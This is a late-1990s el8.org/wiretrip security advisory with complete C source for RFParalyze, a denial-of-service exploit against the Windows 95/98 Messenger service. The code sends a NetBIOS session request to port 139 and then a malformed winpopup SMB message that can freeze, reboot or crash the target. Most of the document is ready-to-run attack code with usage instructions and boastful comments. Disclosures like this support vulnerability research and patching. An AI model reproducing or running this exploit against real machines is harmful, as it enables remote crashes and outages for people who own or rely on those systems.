RFParalyze.txt

`  
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--  
  
/ /  
/ e / - el8.org advisory   
/ l /  
/ 8 / - Evan Brewer <[email protected]>  
/ . / - Rain Forest Puppy <[email protected]>  
/ o /  
/ r / - Synopsis: Cause undesired effects remotely against   
/ g / win9[5,8] through an oddly formed winpopup message.  
/ /  
  
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--  
  
Details:   
  
Through a netbios session request packet with a NULL source name,  
Windows 9[5,8] show a number of odd responses. Everything from  
lockups, reboots and "the blue screen of death", to total loss of  
network connectivity.   
  
Note that neither el8 or wiretrip discovered the vulnerability;  
instead, a binary-only exploit found in the wild was reversed,  
and the demonstration code attached was reconstructed. So it  
should be noted:  
  
THIS HAS BEEN FOUND IN THE WILD  
  
The vulnerability specificly targets the Messenger service on  
Windows 9[5,8]. At this point, it's doubtful there's anything  
more worthy than a DoS capable. However, any information to the  
contrary would be appreciated. :)  
  
  
Source:   
  
Attached is a quick hack called RFParalyze.c  
  
Greets:   
  
ADM / w00w00 / everyone at el8.org  
  
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--  
  
  
/*********************************** www.el8.org **** www.wiretrip.net **/  
  
/* - el8.org advisory: RFParalyze.c   
  
code by rain forest puppy <[email protected]> -  
coolness exhibited by Evan Brewer <[email protected]> -  
  
- Usage: RFParalyze <IP address> <NetBIOS name>  
  
where <IP address> is the IP address (duh) of the target (note:  
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of  
the server at the IP address given. A kiddie worth his scripts  
should be able to figure out how to lookup the NetBIOS name.   
Note: NetBIOS name must be in upper case.  
  
This code was made from a reverse-engineer of 'whisper', a   
binary-only exploit found in the wild.  
  
I have only tested this code on Linux. Hey, at least it's  
not in perl... ;) -rfp  
  
*/  
  
#include <stdio.h> /* It's such a shame to waste */  
#include <stdlib.h> /* this usable space. Instead, */  
#include <string.h> /* we'll just make it more */  
#include <netdb.h> /* props to the men and women */  
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */  
#include <sys/types.h> /* #!w00w00, because they rock */  
#include <netinet/in.h> /* so much. And we can't forget*/  
#include <unistd.h> /* our friends at eEye or */  
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */  
  
/* Magic winpopup message  
This is from \\Beav\beavis and says "yeh yeh"  
Ron and Marty should like the hardcoded values this has ;)   
*/  
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"  
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";  
  
struct sreq /* little structure of netbios session request */  
{  
char first[5];   
char yoname[32];  
char sep[2];  
char myname[32];  
char end[1];  
};  
  
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/  
  
int main(int argc, char *argv[]){  
char buf[4000], myname[33], yoname[33];  
struct sockaddr_in sin;  
int sox, connex, x;  
struct sreq smbreq;  
  
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");  
  
if (argc < 3) {  
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");  
printf(" --IP must be ip address, not dns\n");  
printf(" --NetBIOS name must be in UPPER CASE\n\n");  
exit(1);}  
  
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");  
  
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */  
myname[30]='A'; /* how was Beltaine? :) */  
myname[31]='D';  
  
Pad_Name(argv[2],yoname);  
yoname[30]='A';  
yoname[31]='D';  
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);  
  
sin.sin_addr.s_addr = inet_addr(argv[1]);  
sin.sin_family = AF_INET;  
sin.sin_port = htons(139);  
  
sox = socket(AF_INET,SOCK_STREAM,0);  
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){  
perror("Problems connecting: ");  
exit(1);}  
  
memset(buf,0,4000);  
  
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/  
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/  
memcpy(smbreq.end,"\x00",1); /*what it does :) */  
strncpy(smbreq.myname,myname,32);  
strncpy(smbreq.yoname,yoname,32);  
  
write(sox,&smbreq,72); /* send initial request */  
x=read(sox,buf,4000); /* get their response */  
  
if(x<1){ printf("Problem, didn't get response\n");  
exit(1);}  
  
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");  
else {printf("We didn't get back the A-OK, bailing.\n");  
exit(1);}  
  
write(sox,&blowup,72); /* send the magic message >:) */  
x=read(sox,buf,4000); /* we really don't care, but sure */  
close(sox);  
printf("done\n");  
}  
  
void Pad_Name(char *name1, char *name2)  
{ char c, c1, c2;  
int i, len;  
len = strlen(name1);  
for (i = 0; i < 16; i++) {  
if (i >= len) {  
c1 = 'C'; c2 = 'A'; /* CA is a space */  
} else {  
c = name1[i];  
c1 = (char)((int)c/16 + (int)'A');  
c2 = (char)((int)c%16 + (int)'A');  
}  
name2[i*2] = c1;  
name2[i*2+1] = c2;  
}  
name2[32] = 0; /* Put in the null ...*/  
}  
  
  
/*********************************** www.el8.org **** www.wiretrip.net **/  
  
-/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\-  
  
`